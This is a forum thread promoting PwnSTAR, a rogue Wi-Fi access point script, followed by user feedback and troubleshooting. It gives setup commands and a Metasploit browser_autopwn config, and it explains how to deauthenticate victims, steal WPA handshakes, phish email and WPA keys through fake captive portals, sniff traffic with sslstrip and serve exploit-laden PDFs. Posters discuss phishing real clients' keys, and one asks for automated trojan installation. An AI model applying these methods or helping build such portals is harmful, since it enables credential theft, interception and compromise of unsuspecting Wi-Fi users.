PwnSTAR (Pwn SofT Ap scRipt) now runs on Kali.

https://github.com/SilverFoxx/PwnSTAR (https://github.com/SilverFoxx/PwnSTAR)

Features
takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
steals WPA handshakes
phishes email credentials
serves webpages: supplied (eg hotspot, below) or provide your own
sniffing with ferret and sslstrip
adds a captive portal to the frontend of the fake AP
assorted exploits
de-auth with MDK3, aireplay-ng or airdrop-ng


Use your imagination, craft your own webpages, and have fun.

Vulpi

http://pwn-star.googlecode.com/files/Hotspotscreenshot.png

The README (https://github.com/SilverFoxx/PwnSTAR/blob/master/How_to_use.txt) has some ideas on how to use it.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Basic Menu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc
no internet access given

2) Grab WPA handshake

3) Sniffing: provide internet access, then be MITM

4) Simple web server with dnsspoof: redirect the victim to your webpage

5) Karmetasploit

6) Browser_autopwn

1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it.
Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi

2) Sometimes it is easier to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target.
Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.

3) Provides an open network, so you can sniff the victim's activities.

4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details.
Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof.
DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a better way of hosting hotspot_3

5&6) Provides all the arduous config files to properly set-up these attacks.


Browser_autopwn gaining shells against Windows Vista:
http://pwn-star.googlecode.com/files/autopwn.png




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advanced Menu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a) Captive portals (phish/sniff)

b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)

c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)

d) Java_jre17_jmxbean

e) Choose another browser exploit


a) Uses iptables rules to route the clients. Is essentially a fully functioning captive portal.
Avoids the problems of spoofing.

1) Serves hotspot3. Allows clients onto the internet once credentials are given.

2) Allows you to add a personal header to the index.php.
You could probably copy the php functions from this page onto a cloned page and load that instead.

b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet.
Includes a virgin pdf to which you can add your own payload.

c&d) Launches a couple of example browser exploits

e) Gives a skeleton framework for loading any browser exploit of your choice.
Edit PwnSTAR browser_exploit_fn directly for more control.


Two clients being simultaneously handled by the captive portal:
http://pwn-star.googlecode.com/files/portal.png


Have fun, and READ THE SCRIPT!
Vulpi

Thank you! Love your script :)

I will try that out as soon as I have time to install Kali (first release was bugged for me, keyboard stuff).
I am reading through the code, and it's very neat.


Vulpi, I used to do the same as you :

read apusage
if [[ $apusage = q ]];then
exit_fn
elif [[ $apusage != [1-6] && $apusage != 9 ]];then
first_fn
elif [[ $apusage = 9 ]];then
adv_usage_fn
fi
But I was hinted to use case in ... esac instead, and it's way better. For instance, instead of this barbarian line :"elif [[ $apusage != [1-6] && $apusage != 9 ]];then first_fn" you would jut have to write *) first_fn ;;
I use some of those in Yamas, you should check it out. It's aslo quite easy to replace. "edit" : I see you use it later on in the script, so you should be all right!


if [[ $var = n ]];then
internet=
interface_fn
fi
if [[ $var = y ]];then
if [[ $apusage = 3 || $apusage = a || $apusage = b || $apusage = c ]];then
echo -e "$warn\nDuh, won't work without an internet interface. Start again"
sleep 2
interface_fn
fi
fi
Shouldn't that be one big if with sub ifs, and an elif in case neither y nor n are entered ?


$API is in use, stupid. Try another interface

elif [[ $initial_scan != n ]];then # any value other than n restarts the function
echo -e "$warn\nWhat's it gunna be babe...yes or no?"
ahah :) Havin' fun are ya boy ? :p


echo -e "$info\nConsider using yamas or easy-creds to parse logs"
cheers!


echo "use auxiliary/server/browser_autopwn" > /tmp/karma.rc
echo "setg AUTOPWN_HOST $ap_ip" >> /tmp/karma.rc
echo "setg AUTOPWN_PORT 55550" >> /tmp/karma.rc
echo "setg AUTOPWN_URI /ads" >> /tmp/karma.rc
echo "set LHOST $ap_ip" >> /tmp/karma.rc
echo "set LPORT 45000" >> /tmp/karma.rc
echo "set SRVPORT 55550" >> /tmp/karma.rc
echo "set URIPATH /ads" >> /tmp/karma.rc
echo "run" >> /tmp/karma.rc

---SNIP---
Why not :

echo -en "setg AUTOPWN_HOST $ap_ip
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST $ap_ip
---SNIP---
set URIPATH /ads
run" > /tmp/karma.rc
since you're always writing in the same file?

That's all for now! More feedback when I get my hand on it!

Thank you! Love your script
Thanks charonsecurity. Let me know if you find any bugs.

I am reading through the code, and it's very neat
I should hope so - the first script I ever studied was yamas!

All your comments are valid. The script started out very small; as it grew I simply added more elifs etc. If I was starting from scratch I would do things differently - but I'm too lazy to re-write it!

PS It only took me a few minutes to get yamas running on Kali - your fans are waiting :)

Hi, it's a great tools....
But i try to change Portal_simple php. How many I can change the email and password default page to password 1 and password 2?
if password 1 and password 2 are the same it´s ok you are authorized.

In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):

<tr><td>Email address:</td><td><input type='text' name='email'></td></tr>

In service.php, this is the line to change:

if(($email == "") || ($password == "")){

You probably want something like "if $email != $password" etc.
There are lots of good "learn php in a weekend" tutorials on the net.

In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):

<tr><td>Email address:</td><td><input type='text' name='email'></td></tr>

In service.php, this is the line to change:

if(($email == "") || ($password == "")){

You probably want something like "if $email != $password" etc.
There are lots of good "learn php in a weekend" tutorials on the net.

I change you're portal_simple to this,
portal_simpleOK.rar (10 KB)
https://mega.co.nz/#!fpZFjYQA!ObqAaUlOalOGmCGHPIJ8MXTPfj4GTvBk2Oc28zS oVag
The original is from Technic Dynamic.
Now if password is wrong or blank, show error.
If you can put this in a named portal like "portal_wpa" in you're next release.
Enjoy.

I can't access the mega download. However, the WPA pages by Deathcorps (http://www.backtrack-linux.org/forums/showthread.php?t=47021) do work for me. If you are having problems the first thing I would suggest is to check all the permissions are correct (see script readme).

This attack doesn't need hardcoding into PwnSTAR. The idea is that you can use the script to launch whatever cloned website you wish (Basic menu option 4 "Simple web server with dnsspoof").

Written to textfile.txt, and tailed in an Eterm window (seen in the image in post #2 of this thread). If this isn't happening, my first suggestion is to check the permissions eg is textfile writeable?


Edit: Forgot my own script! "Formdata.txt" it is.

The permissions are ok... The Etern window still shows nothing. I am using "formdata.txt" which is situated in /var/www/hotspot_3. Maybe it has something to do with the apache server, I got this message when your script is launching it: "NameVirtual Host: *80 has no VirtualHosts".

WOuld you mibd helping me to set the apache server correctly?

EDIT: Ok, nevermind, I got rid off the "NameVirtualHost *:80" line in etc/apache2/ports.conf; and I used portal_hotspot instead of hotspot_3 : worked.

I would add that spoofing the mac address prevents the victim to connect to the rogue AP.

hello , im newbie on linux
(using since bt4 , but no good , just folow how to )

i got many probleme with kali ,
im looking for use pwnstar , but it seem not on kali ,
any "how to" download & install it on linux ( step by step ? )

thank's to help

Hi,

I have recently discovered PwnSTAR.

Thank you very much for publishing such a useful script. I really love it.


I would like to give you some feedback about it.

1. Provide a Hotspot; grant Internet access; sniff:
Great attack vector; I was easily able to sniff credentials ( on my own network ); steal cookies / session IDs

2. A smart idea to rely on autoconnet:

My setup;
Wifi network;
Kali on an I5 CPU with decent RAM as the main OS ( not in VM ); internal wireless adapter; Alfa Awus 036H external wireless card
WIN 7 on another machine
WIN XP SP3 on another machine
Android 4.1 on my Smartphone.

I have set up a Honeypot AP on the same channel as my Wifi network with the same name as my Wifi network.
Turned off my Wifi, devices connected flawlessly to the Honeypot AP.

But then turned on my Wifi network;
placed my Alfa Awus antenna directly near the XP, Win 7 and android devices;

Deauthenticated these devices off of my Wifi network
I was hoping that the victim devices would connect to my Honeypot AP since the Alfa Awus signal is relatively strong.
and was placed right near the victim devices;
but no chance to have the devices connect to my Honeypot.

So I assume that this kind of attack is only suitable if for example victims leaves Starbucks; I follow him and have his device
autoconnect to my Honeypot AP;
I would have IP level connectivity, could exploit the machine via metasploit
but that would take most probably longer than I would be connected to the victim
I suppose there is little chance to be successful with this kind of attack.
Do you agree?

3. Attack via Karmetasploit; browser pn, malicious pdf expoit; Java Applet Exploit
All of them are very good attack vectors;
I would focus on the Java Applet Attack Vector; I suppose it is the most successful attack of those 4
I prefer client side attacks.....

Your script is more than excellent.
I just have the problem that the internet access which my victims get is very slow;
what could be the reason? I am on a decent CPU with decent RAM; have a 50MBit line and good wireless card
So maybe you could give me some advice.

What I would love to have in your script is the following:
An exploit which is deployed either via malicious PDF or Java Applet;
the exploit should download a crypted malicious code from an internet server
( a Trojan or a Virus; for example a DNS changing virus / proxy trojan )

Sure I could do that myself on the victim machine as soon as I have a meterpreter session or shell
( could even do it later via meterpreter reverse tcp over no-ip.com or similar )
but I would love to have the installation of malicious code on the victim automated;

Is there such an exploit?

Cheers
Sam

Hi Sam, thanks for taking an interest - I always appreciate feedback.


with the same name as my Wifi network...no chance to have the devices connect to my Honeypot
Your home network is presumably WPA(2), so no device will auto-connect to an open network, even of the same name. If only it were that easy!


So I assume that this kind of attack is only suitable if for example victims leaves Starbucks...
Almost correct. Another possibility is to have a naiive user, DOSed off their own network, then, in frustration, manually connect to your fake AP.


I suppose there is little chance to be successful with this kind of attack.
Do you agree?
Yes, I do. I think the most successful ways of using PwnSTAR (apart from learning/demonstrating) are 1) sniffing on a fake open network (eg "Free WiFi"), and 2) a targeted attack with a specially crafted webpage.


I just have the problem that the internet access which my victims get is very slow; what could be the reason?
I think part of the problem is airbase itself. It's doing a lot of work - it's almost a miracle it works at all. It also varies a lot between wifi drivers. Remember 036H is only transmitting at "g" speeds (although I find the 036NH to be even worse). I posted somewhere on the old forums the download speeds I was seeing.


What I would love to have in your script is the following...
You can do this yourself! For example, in /www/portal_pdf/ is a virgin pdf template. You can use msfpayload to add whatever exploit you wish. Another option is to look at Beef. One day I will integrate it into PwnSTAR.

PS The development version of pwnSTAR is at github, not googlecode - https://github.com/SilverFoxx?tab=repositories. It's not getting much love from me at the moment I'm afraid.

Hi Vulpi,

thank you very much for your help.

Really very much appreciated; you comments have answered all my questions.

Best Regards
Sam

Looks intresting might give it a shot later,

I think part of the problem is airbase itself. It's doing a lot of work - it's almost a miracle it works at all. It also varies a lot between wifi drivers. Remember 036H is only transmitting at "g" speeds (although I find the 036NH to be even worse). I posted somewhere on the old forums the download speeds I was seeing.

Hi,

i tried various tools to set up a Wifi Honeypot ... all with the same result: the vic speed is so **** slow ... ex. open facebook takes about 1-2 min.
I also tried different hardware (dedicated intel quadcore cpu / 16 gb ram / vmware install on i7 / setup on netbook with atom) and used different wifi adapter (alfa awus036h / nh / nhr).

my internet connection was direct eth0 --> router --> 50mbits internet

is it a configuration problem or a fundamelntal issue with fake AP´s ?

This causes a MITM Attack is not workable for me :/

Hi aCiD187,

Fake APs are definitely slow, but nothing like the degree you are describing. I usually manage speeds similar to free public WIFI's - slow but quite useable.

Perhaps monitor AP and victim in wireshark to see if that suggests anything to you. Also check DNS caching. I discussed that in the previous forum; it can give multiple timeouts for previously accessed pages.

Hi I running the script on mac through kali inside VMware fusion. I have eth0 as the bridged internet connected adapter so I am using it as the interface for internet connection when setting up a fake AP. I am having trouble however because eth0 keeps loosing its internet connection and sometimes won't come back on unless I stop the script. Sorry if you have already solved a similar problem.

I'm using the same setup on a macbook air without problem so I'm not certain. One possibility is that the script is trying to macchange eth0. The "dev" version of the script fixes this. Try it at https://github.com/SilverFoxx/PwnSTAR-dev/blob/master/PwnSTAR-dev

Dear Vulpi the Musket Team likes your work!!! - however we wish to note that when we tried to actually connect to the rogueAP we are unable to do so. As we have run across this before with kali, we suspected that there is something wrong with the isc-dhcp-server that is required by network manager. To correct this we simply used dnsmasq. You can find a WPA phishing program for kali by us in these forums and a download link. We used the config file from that program and added one line of code in your script or dnsmasq -C /ect/dnsmasq.conf. When we did that we immediately got the webpage up. In fact it worked so fast that we are in the process of importing our WPA phishing apporach into your program but that will take some time. How to install dnsmasq and all the info you need can be found in https://forums.kali.org/showthread.php?18278-WPA2-and-WPA-Enterprise-phishing-program-for-kali-linux-available-here. There is also a posting in aircrack-ng which may have further info.

A brilliant script.. Thank you for it... But I have one question.. You use a fake Ap and then do various stuff with it... Why not use arp poisoning? It would have better success rates as opposed to fake Ap...

Hi Vulpi,

How to I used Easy-creds to parse the captured sslstrip.log?
I tried but it said no info, on the AP there was client, i tried with my devices.
Thanks for your help.

Dear Vulpi,
We have just noticed that ALL our phishing programs have ceased to function in kali linux. This includes pwnstar9.0. All these programs run fine AND we can associate to the AP using the isc-dhcp-server and or dnsmasq depending on program BUT the client cannot bring down the web pages. As all these programs in four different computers were working fine a week ago so we suspect it is in apache 2 not the isc-dhcp-server as we have other programs that ise dnsmasq. We have updated all of these computer and we are very familiar with the permissions problems etc. Would you consider running your version and have a client try and bring up the web pages. We have test selection 4 with no internet access and 9 a in your program. In fact internet access leaked thru via torrents but we cannot get any web pages in any phishing program to be displayed.

MTA/MTB

Thanks! PwnSTAR ROCKS!!!

Hey I'm trying to condense the softAP + internet commands in PwnStar into just the commands. I have pulled the following form the script but I must be missing something:

iptables --flush # delete all rules in default (filter) table
iptables -t nat --flush
iptables -t mangle --flush
iptables -X # delete user-defined chains
iptables -t nat -X
iptables -t mangle -X
echo "1" > /proc/sys/net/ipv4/ip_forward # enable kernel forwarding
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
airbase-ng -Z 4 -W 1 -c <channel> -e "SSID" -v mon0 2> /dev/null &
sleep 6
modprobe tun # probably not necessary
ifconfig at0 up 172.16.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400

echo > /var/lib/dhcp/dhcpd.leases # Clear any pre-existing dhcp leases
cat /dev/null > /tmp/dhcpd.conf

DHCP setup:
default-lease-time 300; > /tmp/dhcpd.conf
"max-lease-time 360;" >> /tmp/dhcpd.conf
"ddns-update-style none;" >> /tmp/dhcpd.conf
"authoritative;" >> /tmp/dhcpd.conf
"log-facility local7;" >> /tmp/dhcpd.conf
"subnet <subnet like 192.168.0.0> netmask <subnet mask like 255.255.255.0> {" >> /tmp/dhcpd.conf
"range <192.168.0.2 192.168.0.50>" >> /tmp/dhcpd.conf
"option routers $ap_ip;" >> /tmp/dhcpd.conf
"option domain-name-servers 8.8.8.8;" >> /tmp/dhcpd.conf
"}" >> /tmp/dhcpd.conf

dhcpd -cf /tmp/dhcpd.conf ********* ERROR HERE
route add -net <subnet like 192.168.0.0> netmask <subnet mask like 255.255.255.0> gw <gw IP like 192.168.1.1>
iptables -P FORWARD ACCEPT # probably not necessary 'coz we flushed the chains earlier


This however fails when I run the command `dhcpd -cf /tmp/dhcpd.conf` with:

No subnet declaration for at0 (172.16.0.1).
** Ignoring requests on at0. If this is not what
you want, please write a subnet declaration
in your dhcpd.conf file for the network segment
to which interface at0 is attached. **

What am I missing? (dhcp.conf is set up correctly, I'm not just blindly copy/pasting there at least)

We would start by checking the permissions on your dhcp.conf

I have a problem reconnecting to the Internet after I have started the script.
I run it and select option 3 - the MITM mode.
At the point it says to reconnect I can't. What should I be doing to reconnect. I can ping the gateway but not anything on the internet.

Any help would be great

Thanks

We would start by checking the permissions on your dhcp.conf

And you would be 100% correct sirs. Thank you.

To YourMum,

Things that can make pwnstar not function properly are many but it is not in the coding. There are two main problems. Network-Manager can intrude into your operation. And your file permissions can be improperly set.

We suggest you go to this link read the threads and download the files. One of the files has a long help file.

http://forum.aircrack-ng.org/index.php/topic,414.0.html

Next setup a simple web server item 4. Do not offer internet access and see if you can associate to the rogueAP with another computer then log on and enter a password which you can collect by reading the formdata.txt file in the folder that provides the web page.

If this works then try setting up the same simple web server and provide internet access. When you get that working go to item 9 advanced and choose item (a) Captive portals. Provide internet access and see if you can enter a password.

Read the help file in the download it will take you thru most of the problems. It is directed at setting up WPA phishing but it stilll addresses most of the basic problems you will encounter

In closing if your linux has been updated and upgraded pwnstar functions fine. Currentlly we have three computers that run pwnstar and they all run pwnstar fine. Even our persistent usb version works.

Make sure you apache program is up to date we think it is apt-get install apache2. and that your isc-dhcp-server is installed
as well as incron

Pwnstar will install it for you if you have internet access when you run the program

Network Manager can interfere with the ability to associate to the rogueAP if it tries to use your wifi device when running. pwnstar. And if the device actually providing internet access is not actually connected to the internet the webpage will fail.
MTC

Thanks for the pointers. It seems I have a more serious issue as I have no network connectivity at all since running the script. I dual boot Kali with ubuntu and that cannot connect. I'll resolve that and follow your steps to see how I get on

Thanks

i like that tool , works as charm ! nice post

This project has now moved to Github: https://github.com/SilverFoxx (https://github.com/SilverFoxx)

There have been a few incremental changes, nothing too major.

This project has now moved to Github: https://github.com/SilverFoxx (https://github.com/SilverFoxx)

There have been a few incremental changes, nothing too major.
many tnx Vulpi real nice work

The tool is awesome. But most of people are using their iDevices with apps and this tool unable to capture the info. Are we working on modifying the tool to capture info from apps? Thank you.

Thanks Devil_D.

@thepoor. Is there a specific problem with the script; or is this merely the fact that SSLStrip is becoming less effective over time?

@thepoor. Is there a specific problem with the script; or is this merely the fact that SSLStrip is becoming less effective over time?

Hi Vulpi,

The SSLStrip just not able to get the info from apps (Facebook, mail, tweeter). it works perfectly on the browsers.

SSLStrip no longer works on many of the big web apps (Gmail, FB etc). Fixing this is way beyond my abilities. Ettercap may be better in the long-term; I'll look at adding it as an option.

Our Teams have encountered problems when running PwnStar9.0 that are NOT the fault of the program! When running this program we suggest you do the following:

After installation you must check the functionality of the system not just the program. To test we suggest you run item 4 in the basic menu and do not provide internet access. Run up a second computer to simulate a client and do the following tests.

1. See if the rougueAP you have established it seen by the client computers’ wifi device. If the rogueAP name you setup is not seen shut down PwnStar9.0 and run thru the program setup again, you have probably done something wrong as you responded to the menu driven setup. Also with some laptops the network manager of the computer running the rogueAP must be enabled but not associated to any wifi station. Right click on the network manager icon (two computers upper right on screen) then click on Enable Networking. You now should see a check mark next to Enable Networking. Now start PwnStar9.0 again.

2. Once the client computer can see the rogueAP name, use the client computer to try and associate to the rogueAP. If you cannot, more then likely network manager in the rogueAP computer is using the rogueAP’s wifi device to associate to a wifi station and/or trying to associate to a station. Do not unenable wifi manager. Simply allow network manager to associate to a wifi station and then left-click on network manger and in the drop down window, disconnect the device from the AP. The rogueAP device is now free, allowing the client computer to associate to the rogueAP.

Some wifi devices cannot associate to this rogueAP set up by PwnStar. For example Broadcom Wireless Utility 802.11n(Broadcom BCM4313 8902.11b/g/n) will only associate occasionally if at all. There may be others. So do not use this wifi device to test Pwnstar.

3. If your client computer obtains association to the rogueAP, use your web browser and attempt to bring up the phishing web page.

If you get an apache2.2 webpage error when trying to bring up the web page, the problem is in the permissions you set for the files in the /var/web/ folder BUT manually setting them thru Application/Files etc will not solve the problem. The solution is to open a terminal window and type:

chmod -R 777 /var/www/

This will allow read and write to all the files in that folder to all access levels and allow executing as a program. If you do not like that level of permissions setting then:

chmod -R 755 /var/www/

This will allow read and execute to groups and others but there is a problem. The formdata.txt file would then not allow the client computer to write to it and therefore any code phished would be lost. So try using the Applications/File/properties/permissions set the formdata.txt. file to allow read and write at all levels and execute as a program.

Now try and bring up the web page.

If the page cannot be found make sure your browser is requesting a simple http:// site like http://google.com etc. The dnsspoof program does not like https:// or some long complicated web pages. Writing a custom page for dnsspoof never worked for us.

3. Once you have the phishing web page expressed on your client's computer screen enter a code and see if it is written to the formdata.txt file. Go to the formdata.txt. file in the folder for the phishing web page you chose to setup. If the code is not seen either the permissions are incorrectly set or you have gone to the wrong folder in /var/www/

If the code is seen, thank the author of PwnStar for all his work and then go phishing.

Musket Team A and C

Hey Vulpi, great work on this script!

I'm having difficulties getting anything written to formdata.txt. I ran chmod -R 777 /var/www/ in the /var/www/ folder and double checked the permissions on formdata.txt but nothing I enter into the phishing page gets saved.

Additionally, the deauth isn't kicking clients from the target AP. I was able to associate with my router (the target router) despite pwnstar sending deauths.

Any thoughts on what might be the problem?

Are you going to the correct formdata.txt file in the correct folder. Remember each webpage folder has a formdata text file. Furthermore manually look to see if the permissions are set properly.

MTC

I'm having a few issues using this script.

I am trying to setup a fake AP with internet access trying to sniff information. I am using option 3, of course.

I am using a Alfa AWUS036NH as the device that is my fake AP, and my internal realtek (I cant remember the exact model number. Can be gotten if needed.) for internet access.

The first issue I'm having is that; my AP broadcasts fine, but when I try connecting to it on my alternate laptop which has Windows 7, it says that it cannot connect. The same is true for my Android 4.4; detects fine, but can't connect. This is obviously a big issue.

Secondly, when airbase-ng starts up, it goes fine until a few lines down where it has the error: "Got channel -1, expecting channel >0", where it would stop, then continue on with receiving probes. However, I distinctly remembering setting my Soft-AP channel to 1. Odd.

Third, I do not know where to get ferret. When I say yes to using ferret, the terminal opens, then closes after saying "no such file found" (paraphrased). If it matters, I used lazylinux to install PwnStar.

Does anyone have any solutions?

We will try and address a few of these problems but we are only guessing as we have never seen such.

1. Are you using Kali-linux 1.07?
2. Vulpi the author has issued an updated version a few months ago you should download this.
3. We do not know what you mean when you say you installed Pwnstar9.0
You will though have to install two programs which Pwnstar9.0 will prompt you to install - incron and one other.

4. You should use your AWUSO36NH with airbase-ng.
5. Read thru all the entries in this thread
6. Setup item 4 and do not provide internet access first, - read our suggestions in the threads above. If your network-manager is trying to use your wifi device supporting airebase-ng to associate to a wifi station then association to your fakeAP is impossible.

You may be having a negative-one issue with airbase-ng BUT we are only guessing. Go here:

https://forums.kali.org/showthread.php?21512-A-Simple-Solution-to-the-Negative-One-Issue-thanks-to-seen_bawl&highlight=negative-one

You can download the script files at the link. Or you can try these commands which should work with your AWUSO36NH

airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0
ifconfig wlan0 down
macchanger -r wlan0
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30
iwconfig wlan0 rate 1M
airmon-ng start wlan0
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up

Now try running Pwnstar and see if you are getting the channel hopping with airbase-ng.

If the channel problem remains try running airbase-ng from a terminal window and see what you get.


We cannot help you with ferret sorry.

MTB

hello! using your great script as a newbie, however finding it extremely simple to use! just a question....on "official" captive portals like those in shops, airports and so on, once connected i always receive a notification that brings me to the auth page, whether i am using a pc with windows, a mobile with android or an iphone. this way it' always sure i digit keys to authenticate. is it possible to implement this on a rogue portal page? using the portal pages included in pwnstar doesn't prompt nothing, so when i try to log into my evil twin i am testing i simply don't know if the fake page works or not, unless i open an internet page and go to www.google.com or other short, direct sites (this is another problem i have) . this is quite problematic on mobile, because most of the time nobody surf the web via browser, but using the various apps (facebook, twitter and so on) and making totally useless the captive portal page... any help please? thanks

You will increase the ability of a client to bring up your webpage if you use 9 a ie Advanced menu Captive Portals and provide internet access. Dnsspoof doesnot work very well. There are also other problems which 9a solves easily.

MTC

You will increase the ability of a client to bring up your webpage if you use 9 a ie Advanced menu Captive Portals and provide internet access. Dnsspoof doesnot work very well. There are also other problems which 9a solves easily.

MTC


thanks for your answer. unfortunately if i use option 9 and give internet access any iphone/android app connected to the ap simply completely bypass the captive portal, and the device has full internet access without giving credentials...routing doesn't work at all

We are not the author of PwnStar9.0 just a user. We do not use iphone or android apps - however your problem interests us therefore if our team can get access to iphone/ android we will test it. To be fair we do not understand exactly what information you are trying to obtain. Are you using the login pages supplied by pwnstar to gain login data or are you trying to obtain e-mail username password pairs.

We are not the author of PwnStar9.0 just a user. We do not use iphone or android apps - however your problem interests us therefore if our team can get access to iphone/ android we will test it. To be fair we do not understand exactly what information you are trying to obtain. Are you using the login pages supplied by pwnstar to gain login data or are you trying to obtain e-mail username password pairs.

i am trying to create a rogue ap with a fake portal page where the user have to digit his real wpa pass to proceed. the problem is that if the user access the ap with a smartphone/ipad/tablet and not a pc (as most people now does) the portal page isn't shown, so if i give internet connection via pwnstar the user has complete internet access without giving keys, while if i don't give internet access looks like the ap has problems because every page times out, and so the user quit it

Okay you are trying to conduct a wpa phishing operation. The first working versions of this was developed by techdynamics but there were several operational obstacles that had to be worked out. Musket Teams have taken the work of techdynamics and developed a working system and then employed pwnstar9.0. Go to these links then down load the files and read thru the help files. The problems of phishing a WPA key from a client are outlined. Furthermore web pages have been developed specifically for WPA.

https://forums.kali.org/showthread.php?21114-New-WPA-Phishing-system-using-pwnstar9-0-released-for-general-use&highlight=phishing

https://forums.kali.org/showthread.php?18278-WPA2-and-WPA-Enterprise-phishing-program-for-kali-linux-available-here&highlight=phishing

MTB

Okay you are trying to conduct a wpa phishing operation. The first working versions of this was developed by techdynamics but there were several operational obstacles that had to be worked out. Musket Teams have taken the work of techdynamics and developed a working system and then employed pwnstar9.0. Go to these links then down load the files and read thru the help files. The problems of phishing a WPA key from a client are outlined. Furthermore web pages have been developed specifically for WPA.

https://forums.kali.org/showthread.php?21114-New-WPA-Phishing-system-using-pwnstar9-0-released-for-general-use&highlight=phishing

https://forums.kali.org/showthread.php?18278-WPA2-and-WPA-Enterprise-phishing-program-for-kali-linux-available-here&highlight=phishing

MTB

thanks, as you have probably read on the other topic too i already used your modified script but without success...the events i am describing are never faced in any other discussion (i have checked them all), even if it seems strange because nowadays there's more and more people using idevices to connect internet than pc...this leads me to thinks that or nobody has tested an attack against an ap used by mobile devices or there's something in my setup, but everything works fine (except for the long addresses and the fact that it's working on pc, where everybody uses a browser to surf internet so no problem in showing the fake portal page)

We have never had any problems getting the web page expressed in the client computer when providing internet access. And as you point out the dnsspoof has its limits. If we get the chance we will try it with ipod or android and see what happens.
We get all sorts of data typed into the windows. In one case the rogueAP was simulating an ISP login page and clients were logging on with their WPA key. So donot be surprised of what data you retrieve.

MTB

To forumkali,

We have run some tests and the results were surpising.

We tested three(3) mobile phones;

1.Sony Xperia Go which used andriod
2.Nokia Asha
3.Iphone Clone using andriod software

We are unsure of the operating system on the Nokia. Maybe some reader can fill in the blanks.

Using Pwnstar9.0 and kali-linux.07 persistent usb flash drive

Our first test were using 9 Advanced a) captive portal providing internet access.

The more expensive Sony was useless. Slow intenet connection. Within 10 feet of the antenna the reception remained poor and it only connected to the rogueAP once. Most of the time was spent trying to get an IP address. It was never able to pull up the phishing web page.

The Nokia Asha and the Iphone clone using Andriod software connected two rooms away with the RogueAP and had the phony ISP web page on the screen instantly. Even faster then our computers. They sent the typed username and password. Everything work perfectly.

Next we ran up the Musket version of Pwnstar9.0 or pwnstar9.0-mv1.2 written for WPA Phishing.

We selected 4. Simple web server with dnsspoof and did not provide internet access. In this musket version, routines for item 4 are rewritten for better connection so item 4 in this version is Not Stock Pwnstar9.0.

The Sony Xperia Go did nothing. It was unable to see the RogueAP half the time and when it could find the RogueAP it spent all its time trying to connect and get an IP address. You could use Pigons from WWI faster.

The Nokia Asha and Iphone Clone were the exact opposite. Excellant reception many rooms away. They both sent the WPA key instantly. Everything worked perfectly.

In closing we so far have not seen this problem.


MTA

To forumkali,

We have run some tests and the results were surpising.

We tested three(3) mobile phones;

1.Sony Xperia Go which used andriod
2.Nokia Asha
3.Iphone Clone using andriod software

We are unsure of the operating system on the Nokia. Maybe some reader can fill in the blanks.

Using Pwnstar9.0 and kali-linux.07 persistent usb flash drive

Our first test were using 9 Advanced a) captive portal providing internet access.

The more expensive Sony was useless. Slow intenet connection. Within 10 feet of the antenna the reception remained poor and it only connected to the rogueAP once. Most of the time was spent trying to get an IP address. It was never able to pull up the phishing web page.

The Nokia Asha and the Iphone clone using Andriod software connected two rooms away with the RogueAP and had the phony ISP web page on the screen instantly. Even faster then our computers. They sent the typed username and password. Everything work perfectly.

Next we ran up the Musket version of Pwnstar9.0 or pwnstar9.0-mv1.2 written for WPA Phishing.

We selected 4. Simple web server with dnsspoof and did not provide internet access. In this musket version, routines for item 4 are rewritten for better connection so item 4 in this version is Not Stock Pwnstar9.0.

The Sony Xperia Go did nothing. It was unable to see the RogueAP half the time and when it could find the RogueAP it spent all its time trying to connect and get an IP address. You could use Pigons from WWI faster.

The Nokia Asha and Iphone Clone were the exact opposite. Excellant reception many rooms away. They both sent the WPA key instantly. Everything worked perfectly.

In closing we so far have not seen this problem.


MTA

thank you for your test. when you connected with any of your devices to the fake ap did you get a pop up notification on your phone that says credentials are needed (as happens on public hotpost) or nothing? to see the captive portal page you had to manually open your browser?

These phones have different firmware and we let the owners operate the phones while we watched. We never saw a credentials page. Furthermore we were surpised with the ease the phones brought up the wpa phishing page when using dnsspoof - far easier then some of our computers. Users clicked on their google icon or tried to surf the net and the phishing page was instantly seen.
We are happy to test again if you give us a series of steps so that we can try and induce your problem.

MTB

These phones have different firmware and we let the owners operate the phones while we watched. We never saw a credentials page. Furthermore we were surpised with the ease the phones brought up the wpa phishing page when using dnsspoof - far easier then some of our computers. Users clicked on their google icon or tried to surf the net and the phishing page was instantly seen.
We are happy to test again if you give us a series of steps so that we can try and induce your problem.

MTB

